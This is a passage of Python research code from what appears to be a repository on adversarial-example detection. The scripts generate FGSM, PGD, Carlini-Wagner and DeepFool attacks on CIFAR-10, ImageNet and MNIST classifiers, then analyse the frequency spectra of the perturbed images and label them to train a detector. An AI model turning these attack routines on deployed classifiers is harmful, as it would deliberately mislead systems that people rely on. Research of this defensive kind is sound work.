label_choosed=list(features.items())[int(labels[choosed_idx].cpu().numpy())][0]
name=label_choosed+'_'+str(idx+choosed_idx)+'.png'
img_vanilla_np_res=cv2.resize(img_vanilla_np, (224,224))
img_attacked_np_res=cv2.resize(img_attacked_np, (224,224))
img_diff_np_res=cv2.resize(img_diff_np, (224,224))
cv2.imwrite(os.path.join(vanilla_dir,name), img_vanilla_np_res)
cv2.imwrite(os.path.join(diff_dir,name), img_diff_np_res)
cv2.imwrite(os.path.join(attacked_dir,name), img_attacked_np_res)
def pathlist2np(pathlist):
batch_num=len(pathlist)
images_num=pathlist[0].shape[0]
method_num=pathlist[0].shape[1]
path_num=pathlist[0].shape[2]
paths=np.zeros((batch_num*images_num,method_num,path_num))
for i in range(batch_num):
paths[i*images_num:(i+1)*images_num,...]=pathlist[i]
return paths
def load_imagenet_filenames(dataset_dir,features):
filename=dataset_dir+'.txt'
with open(filename, 'r') as f:
data_list=f.readlines()
label_list=[]
image_list=[]
for data in data_list:
sysnet,name=data.split('/')
label_list.append(features[sysnet])
image_list.append(data.replace('\n',''))
return image_list,label_list
def load_imagenet_batch(batch_idx,batch_size,data_dir,data_list,label_list):
filenames=data_list[batch_idx*batch_size:(batch_idx+1)*batch_size]
labels=np.array(label_list[batch_idx*batch_size:(batch_idx+1)*batch_size])
images=np.zeros([batch_size,224,224,3])
for file_idx,file in enumerate(filenames):
image = Image.open(os.path.join(data_dir,file)).convert('RGB').resize([224,224])
images[file_idx,...] = np.asarray(image)/255.0
images=images.transpose(0,3,1,2).astype(np.float32)
# images=images
return images,labels
'''
settings
'''
# ้
็ฝฎ่งฃ้ๅจๅๆฐ
if len(sys.argv)!=5:
print('Manual Mode !!!')
model_type ='resnet50_imagenet'
att_method ='FGSM_L2_IDP'
eps ='1.0'
device = 0
# print('aaa')
else:
print('Terminal Mode !!!')
model_type = sys.argv[1]
att_method = sys.argv[2]
eps = sys.argv[3]
device = int(sys.argv[4])
# print('bbb')
batch = 1000
flag_imagenet = 0
# img_per_batch = 2
# setup_seed(0)
dir_model = '../models/cifar_vanilla_'+model_type+'.pth.tar'
'''
ๅ ่ฝฝๆจกๅ
'''
dataset ='cifar-10'
if model_type == 'resnet50_imagenet':
model = models.resnet50(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset ='imagenet'
elif model_type == 'vgg16_imagenet':
model = models.vgg16(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset ='imagenet'
elif model_type == 'alexnet_imagenet':
model = models.alexnet(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset ='imagenet'
elif model_type == 'resnet50':
model = resnet50().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'vgg16':
model = vgg16_bn().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'allconv':
model = AllConvNet(10).eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
else:
raise Exception('Wrong model name: {} !!!'.format(model_type))
if 'cifar-10'==dataset:
mean = np.array((0.5,0.5,0.5),dtype=np.float32)
std = np.array((0.5,0.5,0.5),dtype=np.float32)
nb_classes = 10
input_shape=(3,32,32)
with open(os.path.join("../models/cifar-10_class_to_idx.json")) as f:
features=json.load(f)
data_dir = '../../../../../media/ubuntu204/F/Dataset/Dataset_tar/cifar-10-batches-py'
images,labels = load_CIFAR_batch(os.path.join(data_dir,'test_batch'))
elif 'imagenet'==dataset:
mean = np.array((0.485, 0.456, 0.406),dtype=np.float32)
std = np.array((0.229, 0.224, 0.225),dtype=np.float32)
nb_classes = 1000
input_shape=(3,224,224)
with open(os.path.join("../models/imagenet_class_to_idx.json")) as f:
features=json.load(f)
data_dir='../../../../../media/ubuntu204/F/Dataset/ILSVRC2012/val'
images,labels=load_imagenet_filenames(data_dir,features)
else:
raise Exception('Wrong dataset type: {} !!!'.format(dataset))
fmodel = PyTorchClassifier(model = model,nb_classes=nb_classes,clip_values=(0,1),
input_shape=input_shape,loss = nn.CrossEntropyLoss(),
preprocessing=(mean, std))
eps=float(eps)
max_img_uni = 50
'''
ๅ ่ฝฝcifar-10ๅพๅ
'''
# os.environ['CUDA_VISIBLE_DEVICES']=str(device)
'''
ๆปๅปๅๅงๅ
'''
if att_method == 'FGSM_L2_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=2)
elif att_method == 'PGD_L2_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=2,batch_size=128,verbose=False)
elif att_method == 'CW_L2_IDP':
attack = CarliniL2Method(classifier=fmodel,batch_size=128,verbose=False)
elif att_method == 'Deepfool_L2_IDP':
attack = DeepFool(classifier=fmodel,batch_size=128,verbose=False)
elif att_method == 'FGSM_Linf_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=np.inf)
elif att_method == 'PGD_Linf_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=np.inf,batch_size=128,verbose=False)
elif att_method == 'CW_Linf_IDP':
attack = CarliniLInfMethod(classifier=fmodel,eps=eps,batch_size=128,verbose=False)
elif att_method == 'FGSM_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='fgsm',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'PGD_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='pgd',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'CW_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='carlini',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=True)
batch = max_img_uni
elif att_method == 'Deepfool_L2_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='deepfool',attacker_params={'eps':eps,'norm':2,'verbose':False},eps=eps,norm=2,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'FGSM_Linf_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='fgsm',attacker_params={'eps':eps,'norm':np.inf,'verbose':False},eps=eps,norm=np.inf,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'PGD_Linf_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='pgd',attacker_params={'eps':eps,'norm':np.inf,'verbose':False},eps=eps,norm=np.inf,batch_size=128,verbose=False)
batch = max_img_uni
elif att_method == 'CW_Linf_UAP':
attack = UniversalPerturbation(classifier=fmodel,attacker='carlini_inf',attacker_params={'eps':eps,'norm':np.inf,'verbose':False},eps=eps,norm=np.inf,batch_size=128,verbose=False)
batch = max_img_uni
else:
raise Exception('Wrong Attack Mode: {} !!!'.format(att_method))
'''
่ฏปๅๆฐๆฎ
'''
# fft_transformer = img_transformer(8,0,6)
saved_dir = '../saved_tests/img_attack/'+model_type+'_'+att_method+'_'+str(eps)
success_num = 0
clean_accs = 0
masked_cln_accs = 0
masked_adv_accs = 0
jpg_cln_accs = 0
jpg_adv_accs = 0
pca_cln_accs = 0
pca_adv_accs = 0
pcab_cln_accs = 0
pcab_adv_accs = 0
model_sparsity_threshold = None
batch_num = int(len(labels)/batch)
# pather = my_critical_path(model, 80, 'cifar-10')
s_analyzer = img_spectrum_analyzer(input_shape[1])
map_diff_cln = []
map_diff_adv = []
map_diff_msk = []
clean_path_list = []
adv_path_list = []
msk_clean_path_list = []
msk_adv_path_list = []
Es_cln_list = []
Es_adv_list = []
Es_mcln_list = []
Es_madv_list = []
Es_diff_list = []
Es_diff_list_mcln = []
Es_diff_list_madv = []
print(batch)
for i in tqdm(range(batch_num)):
if i>0:
continue
'''
ๆปๅปไธ้ฒๆค
'''
if 'cifar-10'==dataset:
images_batch = images[batch*i:batch*(i+1),...].transpose(0,3,1,2)
labels_batch = labels[batch*i:batch*(i+1),...]
elif 'imagenet'==dataset:
images_batch,labels_batch=load_imagenet_batch(i,batch,data_dir,images,labels)
# ๅๅงๅ็กฎ็
predictions = fmodel.predict(images_batch)
clean_accs += np.sum(np.argmax(predictions,axis=1)==labels_batch)
# ๆปๅป
img_adv = attack.generate(x=images_batch,y=labels_batch)
predictions = fmodel.predict(img_adv)
success_num += np.sum(np.argmax(predictions,axis=1)!=labels_batch)
# # ไฝ้ขๆปคๆณข clean
# masked_clns = fft_transformer.img_transform_tc(images_batch)
# predictions = fmodel.predict(masked_clns)
# masked_cln_accs += np.sum(np.argmax(predictions,axis=1)==labels_batch)
# # ไฝ้ขๆปคๆณข adv
# masked_advs = fft_transformer.img_transform_tc(img_adv)
# predictions = fmodel.predict(masked_advs)
# masked_adv_accs += np.sum(np.argmax(predictions,axis=1)==labels_batch)
'''
้ข่ฐฑๅๆ
'''
E,_ = s_analyzer.batch_get_spectrum_energy(images_batch)
Es_cln_list.append(E)
E,_ = s_analyzer.batch_get_spectrum_energy(img_adv)
Es_adv_list.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy(masked_clns)
# Es_mcln_list.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy(masked_advs)
# Es_madv_list.append(E)
E,_ = s_analyzer.batch_get_spectrum_energy((img_adv-images_batch))
Es_diff_list.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy((masked_clns-images_batch))
# Es_diff_list_mcln.append(E)
# E,_ = s_analyzer.batch_get_spectrum_energy((masked_advs-images_batch))
# Es_diff_list_madv.append(E)
torch.cuda.empty_cache()
sub_dir='spectrum'
saved_dir_path = '../saved_tests/img_attack/'+model_type+'_'+att_method+'_'+str(eps)+'/'+sub_dir
if not os.path.exists(saved_dir_path):
os.makedirs(saved_dir_path)
Es_cln_np=np.vstack(Es_cln_list)
Es_adv_np=np.vstack(Es_adv_list)
# Es_mcln_np=np.vstack(Es_mcln_list)
# Es_madv_np=np.vstack(Es_madv_list)
Es_diff_np=np.vstack(Es_diff_list)
# Es_diff_np_mcln=np.vstack(Es_diff_list_mcln)
# Es_diff_np_madv=np.vstack(Es_diff_list_madv)
np.save(os.path.join(saved_dir_path,'clean_spectrum.npy'), Es_cln_np)
np.save(os.path.join(saved_dir_path,'adv_spectrum.npy'), Es_adv_np)
# np.save(os.path.join(saved_dir_path,'mclean_spectrum.npy'), Es_mcln_np)
# np.save(os.path.join(saved_dir_path,'madv_spectrum.npy'), Es_madv_np)
np.save(os.path.join(saved_dir_path,'diff_spectrum.npy'), Es_diff_np)
# np.save(os.path.join(saved_dir_path,'mcln_diff_spectrum.npy'), Es_diff_np_mcln)
# np.save(os.path.join(saved_dir_path,'madv_diff_spectrum.npy'), Es_diff_np_madv)
```
#### File: adaptive-jpeg-compression/code_history/my_spectrum_labeler.py
```python
import numpy as np
# import matplotlib.pyplot as plt
# from mpl_toolkits.mplot3d import Axes3D
from my_spectrum_analyzer import img_spectrum_analyzer
import torch
from torchvision import transforms #datasets, models,
from tqdm import tqdm
import os
import sys
import torch.nn as nn
import time
from models.cifar.allconv import AllConvNet
from models.resnet import resnet50
from models.vgg import vgg16_bn
from models.cifar.allconv import AllConvNet
import torchvision.models as models
from third_party.ResNeXt_DenseNet.models.densenet import densenet
from third_party.ResNeXt_DenseNet.models.resnext import resnext29
from third_party.WideResNet_pytorch.wideresnet import WideResNet
from art.attacks.evasion import FastGradientMethod,DeepFool
from art.attacks.evasion import CarliniL2Method,CarliniLInfMethod
from art.attacks.evasion import ProjectedGradientDescent
# from art.attacks.evasion import UniversalPerturbation
from art.estimators.classification import PyTorchClassifier
import json
sys.path.append("..")
# from train_code.my_img_transformer import img_transformer
# from mpl_toolkits.mplot3d import Axes3D
# from sklearn.manifold import TSNE
sys.path.append('../common_code')
from load_cifar_data import load_CIFAR_batch,load_CIFAR_train
class img_spectrum_labeler:
# ่งฃ้ๅจๅๅงๅ
def __init__(self,dataset):
if 'imagenet'==dataset:
self.img_size=224
mean_now=[0.485, 0.456, 0.406]
std_now=[0.229, 0.224, 0.225]
self.num_classes=1000
elif 'cifar-10'==dataset:
self.img_size=32
mean_now=[0.5] * 3
std_now=[0.5] * 3
self.num_classes=10
else:
print('ERROR DATASET')
self.trans=transforms.Compose([transforms.Normalize(mean=mean_now, std=std_now)])
self.s_analyzer=img_spectrum_analyzer(self.img_size).batch_get_spectrum_feature#batch_get_spectrum_energy
def select_attack(self, fmodel, attack_idx, eps_idx):
attack_names=['FGSM_L2_IDP','PGD_L2_IDP','CW_L2_IDP','Deepfool_L2_IDP','FGSM_Linf_IDP','PGD_Linf_IDP','CW_Linf_IDP']
eps_L2=[0.1,1.0,10.0,100.0]
eps_Linf=[0.01,0.1,1.0,10.0]
att_method=attack_names[attack_idx]
if 'L2' in att_method:
eps=float(eps_L2[eps_idx%len(eps_L2)])
else:
eps=float(eps_Linf[eps_idx%len(eps_Linf)])
if att_method == 'FGSM_L2_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=2)
elif att_method == 'PGD_L2_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=2,batch_size=512,verbose=False)
elif att_method == 'CW_L2_IDP':
attack = CarliniL2Method(classifier=fmodel,batch_size=512,verbose=False)
elif att_method == 'Deepfool_L2_IDP':
attack = DeepFool(classifier=fmodel,batch_size=512,verbose=False)
elif att_method == 'FGSM_Linf_IDP':
attack = FastGradientMethod(estimator=fmodel,eps=eps,norm=np.inf)
elif att_method == 'PGD_Linf_IDP':
attack = ProjectedGradientDescent(estimator=fmodel,eps=eps,norm=np.inf,batch_size=512,verbose=False)
elif att_method == 'CW_Linf_IDP':
attack = CarliniLInfMethod(classifier=fmodel,eps=eps,batch_size=512,verbose=False)
else:
raise Exception('Wrong Attack Mode: {} !!!'.format(att_method))
return attack, eps
def get_energy_label(self, model, imgs_in, labels_in, is_adv):
assert imgs_in.shape[-2]==imgs_in.shape[-1]
spectrum = self.s_analyzer(imgs_in)
labels_out = is_adv * np.ones(labels_in.shape)
return spectrum,labels_out.reshape((-1,1))
if __name__=='__main__':
'''
settings
'''
# ้
็ฝฎ่งฃ้ๅจๅๆฐ
if len(sys.argv)!=4:
print('Manual Mode !!!')
model_type = 'allconv'
data = 'train'
device = 2
else:
print('Terminal Mode !!!')
model_type = sys.argv[1]
data = sys.argv[2]
device = int(sys.argv[3])
'''
ๅ ่ฝฝcifar-10ๅพๅ
'''
os.environ['CUDA_VISIBLE_DEVICES']=str(device)
dir_cifar = '../../../../../media/ubuntu204/F/Dataset/Dataset_tar/cifar-10-batches-py'
if 'test'==data:
images,labels = load_CIFAR_batch(os.path.join(dir_cifar,'test_batch'))
elif 'train'==data:
images,labels = load_CIFAR_train(dir_cifar)
else:
print('Wrong data mode !!!')
'''
ๅ ่ฝฝๆจกๅ
'''
dataset='cifar-10'
dir_model = '../models/cifar_vanilla_'+model_type+'.pth.tar'
if model_type == 'resnet50_imagenet':
model = models.resnet50(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset = 'imagenet'
elif model_type == 'vgg16_imagenet':
model = models.vgg16(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset = 'imagenet'
elif model_type == 'alexnet_imagenet':
model = models.alexnet(pretrained=True).eval()
model = torch.nn.DataParallel(model).cuda()
dataset = 'imagenet'
elif model_type == 'resnet50':
model = resnet50().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'vgg16':
model = vgg16_bn().eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
elif model_type == 'allconv':
model = AllConvNet(10).eval()
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(dir_model)
model.load_state_dict(checkpoint["state_dict"],True)
else:
raise Exception('Wrong model name: {} !!!'.format(model_type))
model.eval()
if 'cifar-10'==dataset:
mean = np.array((0.5,0.5,0.5),dtype=np.float32)
std = np.array((0.5,0.5,0.5),dtype=np.float32)
nb_classes = 10
input_shape=(3,32,32)
rober_np= np.array([[0,1],[0,2],[0,3],
[1,1],[1,2],[1,3],
[8,1],[8,2],[8,3],
[9,1],[9,2],[9,3],
[4,1],[4,2],[4,3],
[5,1],[5,2],[5,3],
[12,1],[12,2],[12,3],
[13,1],[13,2],[13,3],
]) # ่ขซๆ ไธบrober็่ฎพ็ฝฎ
elif 'imagenet'==dataset:
mean = np.array((0.485, 0.456, 0.406),dtype=np.float32)
std = np.array((0.229, 0.224, 0.225),dtype=np.float32)
nb_classes = 1000
input_shape=(3,224,224)
rober_np= np.array([[0,1],[0,2],[0,3],
[1,1],[1,2],[1,3],
[8,1],[8,2],[8,3],
[9,1],[9,2],[9,3],
[4,1],[4,2],[4,3],
[5,1],[5,2],[5,3],
[12,1],[12,2],[12,3],
[13,1],[13,2],[13,3],
]) # ่ขซๆ ไธบrober็่ฎพ็ฝฎ
else:
raise Exception('Wrong dataset type: {} !!!'.format(dataset))
fmodel = PyTorchClassifier(model = model,nb_classes=nb_classes,clip_values=(0,1),
input_shape=input_shape,loss = nn.CrossEntropyLoss(),
preprocessing=(mean, std))
'''
่ฏปๅๆฐๆฎ
'''
labeler = img_spectrum_labeler(dataset)
# fft_transformer = img_transformer(8,0,6)
batch = 10
batch_num = int(len(labels)/batch)
spectrums_list = []
labels_list = []
start_time = time.time()
for i in tqdm(range(batch_num)):
'''
ๆปๅปไธ้ฒๆค
'''
images_batch = images[batch*i:batch*(i+1),...].transpose(0,3,1,2)
labels_batch = labels[batch*i:batch*(i+1),...]
# ๆ ไธบๅฏนๆๆ ทๆฌ
attack_name=np.random.randint(1)
attack_eps=np.random.randint(4)
attack,eps=labeler.select_attack(fmodel,attack_name, attack_eps)
images_adv = attack.generate(x=images_batch,y=labels_batch)
# ๆ นๆฎๅ่กจๆ ไธบๆๅฎณๆๆ ๅฎณๆ ทๆฌ
flag_rober=0
for m in range(rober_np.shape[0]):
if (attack_name==rober_np[m,0]) and (attack_eps==rober_np[m,1]):
flag_rober=1
break
spectrums_save,labels_save=labeler.get_energy_label(model, images_adv, labels_batch, flag_rober)
spectrums_list.append(spectrums_save)
labels_list.append(labels_save)
sub_dir='spectrum_label/'+model_type
saved_dir_path = '../saved_tests/img_attack/'+sub_dir
if not os.path.exists(saved_dir_path):
os.makedirs(saved_dir_path)
spectrums_np=np.vstack(spectrums_list)
labels_np=np.vstack(labels_list)
np.save(os.path.join(saved_dir_path,'spectrums_'+data+'.npy'), spectrums_np)
np.save(os.path.join(saved_dir_path,'labels_'+data+'.npy'), labels_np)
end_time=time.time()
print(("Time %f s")%(end_time-start_time))
```
#### File: adaptive-jpeg-compression/common_code/load_cifar_data.py
```python
import os
import numpy as np
from six.moves import cPickle as pickle
# from scipy.misc import imread
import platform
from PIL import Image
def load_pickle(f):
version = platform.python_version_tuple() # ๅpython็ๆฌๅท
if version[0] == '2':
return pickle.load(f) # pickle.load, ๅๅบๅๅไธบpython็ๆฐๆฎ็ฑปๅ
elif version[0] == '3':
return pickle.load(f, encoding='latin1')
raise ValueError("invalid python version: {}".format(version))
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = load_pickle(f) # dict็ฑปๅ
X = datadict['data'] # X, ndarray, ๅ็ด ๅผ
Y = datadict['labels'] # Y, list, ๆ ็ญพ, ๅ็ฑป
X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype(np.float32)/255.0
Y = np.array(Y)
return X, Y
def load_CIFAR_train(filename):
""" load single batch of cifar """
data_list = []
label_list = []
for i in range(1,6):
file = 'data_batch_{0}'.format(i)
f = os.path.join(filename,file)
data, label = load_CIFAR_batch(f)
data_list.append(data)
label_list.append(label)
X = np.concatenate(data_list)
Y = np.concatenate(label_list)
return X,Y
def load_imagenet_filenames(dataset_dir,features):
filename=dataset_dir+'.txt'
with open(filename, 'r') as f:
data_list=f.readlines()
label_list=[]
image_list=[]
for data in data_list:
sysnet,name=data.split('/')
label_list.append(features[sysnet])
image_list.append(data.replace('\n',''))
return image_list,label_list
def load_imagenet_batch(batch_idx,batch_size,data_dir,data_list,label_list):
filenames=data_list[batch_idx*batch_size:(batch_idx+1)*batch_size]
labels=np.array(label_list[batch_idx*batch_size:(batch_idx+1)*batch_size])
images=np.zeros([batch_size,224,224,3])
for file_idx,file in enumerate(filenames):
image = Image.open(os.path.join(data_dir,file)).convert('RGB').resize([224,224])
images[file_idx,...] = np.asarray(image)/255.0
images=images.transpose(0,3,1,2).astype(np.float32)
# images=images
return images,labels
```
#### File: Test/CW/adaptive_CWL2_MNIST.py
```python
home_root = '~/' #change it to your own home path
nn_robust_attack_root = '/home/ll/nn_robust_attacks/' #change it to where you put the 'nn_robust_attacks' directory
import sys
sys.path.insert(0,home_root)
sys.path.insert(0,nn_robust_attack_root)
import os
import tensorflow as tf
import numpy as np
import time
import math
import matplotlib.pyplot as plt
from setup_mnist import MNIST, MNISTModel
from l2_attack import CarliniL2
from l2_adaptive_attack import CarliniL2Adaptive
# In[2]:
def generate_data(data, samples, targeted=False, start=9000, inception=False):
inputs = []
targets = []
for i in range(samples):
if targeted:
if inception:
seq = random.sample(range(1,1001), 10)
else:
seq = range(data.test_labels.shape[1])
for j in seq:
if (j == np.argmax(data.test_labels[start+i])) and (inception == False):
continue
inputs.append(data.test_data[start+i])
targets.append(np.eye(data.test_labels.shape[1])[j])
else:
inputs.append(data.test_data[start+i])
targets.append(data.test_labels[start+i])
inputs = np.array(inputs)
targets = np.array(targets)
return inputs, targets
def getProbabilities(img, model,sess):
imgTobePre = np.reshape(img, (1,28,28,1))
preList = np.squeeze(model.model.predict(imgTobePre))
return max(sess.run(tf.nn.softmax(preList)))
def mnistPredicate(img, model):
imgTobePre = np.reshape(img, (1,28,28,1))
preList = np.squeeze(model.model.predict(imgTobePre))
return preList.argmax()
# In[3]:
def normalization(image):
image[image < -0.5] = -0.5
image[image > 0.5] = 0.5
# In[ ]:
if __name__ == "__main__":
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
modelPath = '%smodels/mnist' % (nn_robust_attack_root)
data, model = MNIST(), MNISTModel(modelPath, sess)
blind_attack = CarliniL2(sess, model, batch_size=1, max_iterations=2000,confidence=0,binary_search_steps=5,initial_const=1.,learning_rate=1e-1,targeted=False)
adaptive_attack = CarliniL2Adaptive(sess, model, batch_size=1,confidence=0, max_iterations=2000,binary_search_steps=5,initial_const=1.,learning_rate=1e-1,targeted=False)
inputs, targets = generate_data(data, samples=1000, targeted=False, start=9000, inception=False)
total = 0
disturbed_failure_number1 = 0
test_number1 = 0
disturbed_failure_number2 = 0
test_number2 = 0
l2_distances = []
l2_distances2 = []
for i in range(len(targets)):
print(i)
inputIm = inputs[i:(i+1)]
target = targets[i:(i+1)]
oriCorrectLabel = data.test_labels[i+9000].argmax()
octStart = time.time()
oriPredicatedLabel = mnistPredicate(inputIm, model)
oriProb = getProbabilities(inputIm,model,sess)
octEnd = time.time()
if oriPredicatedLabel != oriCorrectLabel:
continue
total+=1
attackStart = time.time()
adv = blind_attack.attack(inputIm,target)
adv2 = adaptive_attack.attack(inputIm,target)
attackEnd = time.time()
normalization(adv)
normalization(adv2)
adv = np.reshape(adv, inputIm.shape)
adv2 = np.reshape(adv2,inputIm.shape)
actStart = time.time()
advPredicatedLabel1 = mnistPredicate(adv, model)
advProb1 = getProbabilities(adv,model,sess)
advPredicatedLabel2 = mnistPredicate(adv2, model)
advProb2 = getProbabilities(adv2,model,sess)
actEnd = time.time()
if advPredicatedLabel1 != oriCorrectLabel:
test_number1+=1
distortions1 = np.linalg.norm(adv-inputIm)
l2_distances.append(distortions1)
if advPredicatedLabel2 != oriCorrectLabel:
test_number2+=1
print('labels = ',oriCorrectLabel,' , ',advPredicatedLabel1,' , ',advPredicatedLabel2)
print('probs = ',oriProb,' , ',advProb1,' , ',advProb2)
distortions2 = np.linalg.norm(adv2-inputIm)
print('distortions = ',distortions1,' ; ',distortions2)
l2_distances2.append(distortions2)
print('succeeds = ',total,' ; ', test_number1,' ; ',test_number2)
print(sum(l2_distances)/test_number1)
print(sum(l2_distances2)/test_number2)
```
#### File: Test/FGSM/Test_FGSM_MNIST.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import keras
from keras import backend
import tensorflow as tf
from tensorflow.python.platform import flags
from cleverhans.utils_mnist import data_mnist
from cleverhans.utils_tf import model_train, model_eval, model_argmax
from cleverhans.attacks import FastGradientMethod
from cleverhans.utils import AccuracyReport
from cleverhans.utils_keras import cnn_model
from cleverhans.utils_keras import KerasModelWrapper
import time
import matplotlib.pyplot as plt
import math
FLAGS = flags.FLAGS
# In[2]:
def normalization(image_data):
image_data[image_data<0] = 0
image_data[image_data>1.0] = 1.0
def scalarQuantization(inputDigit, interval, left=True):
retDigit = inputDigit*255
retDigit//=interval
retDigit*=interval
if not left:
halfInterval = interval//2
retDigit+=(halfInterval)
retDigit/=255.0
return retDigit
def oneDEntropy(inputDigit):
expandDigit = np.array(inputDigit*255,dtype=np.int16)
f = np.zeros(256)
for i in range(28):
for j in range(28):
f[expandDigit[i][j]]+=1
f/=784.0
H = 0
for i in range(256):
if f[i] > 0:
H+=f[i]*math.log(f[i],2)
return -H
def crossMeanFilterOperations(inputDigit, start, end, coefficient):
retDigit = np.array(inputDigit, dtype=np.float32)
for row in xrange(start, end):
for col in xrange(start, end):
temp0 = inputDigit[row][col]
for i in range(1,start+1):
temp0+=inputDigit[0][row-i][col]
temp0+=inputDigit[0][row+i][col]
temp0+=inputDigit[0][row][col-i]
temp0+=inputDigit[0][row][col+i]
retDigit[row][col] = temp0/coefficient
return retDigit
def chooseCloserFilter(original_data,filter_data1,filter_data2):
result_data=np.zeros_like(original_data)
for j in range(28):
for k in range(28):
a=abs(filter_data1[j][k]-original_data[j][k])
b=abs(filter_data2[j][k]-original_data[j][k])
if(a<b):
result_data[j][k]=filter_data1[j][k]
else:
result_data[j][k]=filter_data2[j][k]
return result_data
def my_model_argmax(sess, x, predictions, samples):
feed_dict = {x: samples}
probabilities = sess.run(predictions, feed_dict)
return np.reshape(probabilities,10)
# if samples.shape[0] == 1:
# return np.argmax(probabilities)
# else:
# return np.argmax(probabilities, axis=1)
# In[3]:
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
test_end=10000, nb_epochs=6, batch_size=128,
learning_rate=0.001, train_dir="/tmp",
filename="mnist.ckpt", load_model=False,
testing=False):
keras.layers.core.K.set_learning_phase(0)
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
if not hasattr(backend, "tf"):
raise RuntimeError("This tutorial requires keras to be configured"
" to use the TensorFlow backend.")
if keras.backend.image_dim_ordering() != 'tf':
keras.backend.set_image_dim_ordering('tf')
print("INFO: '~/.keras/keras.json' sets 'image_dim_ordering' to "
"'th', temporarily setting to 'tf'")
# Create TF session and set as Keras backend session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
keras.backend.set_session(sess)
# Get MNIST test data
X_train, Y_train, X_test, Y_test = data_mnist(train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end)
# Use label smoothing
assert Y_train.shape[1] == 10
label_smooth = .1
Y_train = Y_train.clip(label_smooth / 9., 1. - label_smooth)
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
y = tf.placeholder(tf.float32, shape=(None, 10))
# Define TF model graph
model = cnn_model()
predictions = model(x)
print("Defined TensorFlow model graph.")
def evaluate():
# Evaluate the accuracy of the MNIST model on legitimate test examples
eval_params = {'batch_size': batch_size}
acc = model_eval(sess, x, y, predictions, X_test, Y_test, args=eval_params)
report.clean_train_clean_eval = acc
assert X_test.shape[0] == test_end - test_start, X_test.shape
print('Test accuracy on legitimate examples: %0.4f' % acc)
train_params = {
'nb_epochs': nb_epochs,
'batch_size': batch_size,
'learning_rate': learning_rate,
'train_dir': train_dir,
'filename': filename
}
# Train an MNIST model
ckpt = tf.train.get_checkpoint_state(train_dir)
ckpt_path = False if ckpt is None else ckpt.model_checkpoint_path
rng = np.random.RandomState([2017, 8, 30])
if load_model and ckpt_path:
saver = tf.train.Saver()
saver.restore(sess, ckpt_path)
print("Model loaded from: {}".format(ckpt_path))
else:
print("Model was not loaded, training from scratch.")
model_train(sess, x, y, predictions, X_train, Y_train, evaluate=evaluate,
args=train_params, save=True, rng=rng)
advGenTimeStart = time.time()
wrap = KerasModelWrapper(model)
advGenTimeStart = time.time()
fgsm = FastGradientMethod(wrap, sess=sess)
fgsm_params = {'eps': 0.3,
'clip_min': 0.,
'clip_max': 1.}
adv_x = fgsm.generate(x, **fgsm_params)
adv_x = sess.run(adv_x, feed_dict={x: X_test[5500:]})
advGenTimeEnd = time.time()
advGenTime = advGenTimeEnd-advGenTimeStart
for i in xrange(4500):
normalization(adv_x[i:(i+1)])
original_classified_wrong_number = 0
disturbed_failure_number = 0
test_number = 0
TTP = 0
TP = 0
FN = 0
FP = 0
for i in range(len(adv_x)):
current_class = int(np.argmax(Y_test[i+5500]))
oriPreTimeStart = time.time()
currentXLabel = model_argmax(sess,x,predictions,X_test[i+5500:(i+5501)])
currentXProbList = my_model_argmax(sess,x,predictions,X_test[i+5500:(i+5501)])
oriPreTimeEnd = time.time()
oriPreTime = oriPreTimeEnd-oriPreTimeStart
if currentXLabel != current_class:
original_classified_wrong_number+=1
continue
advPreTimeStart = time.time()
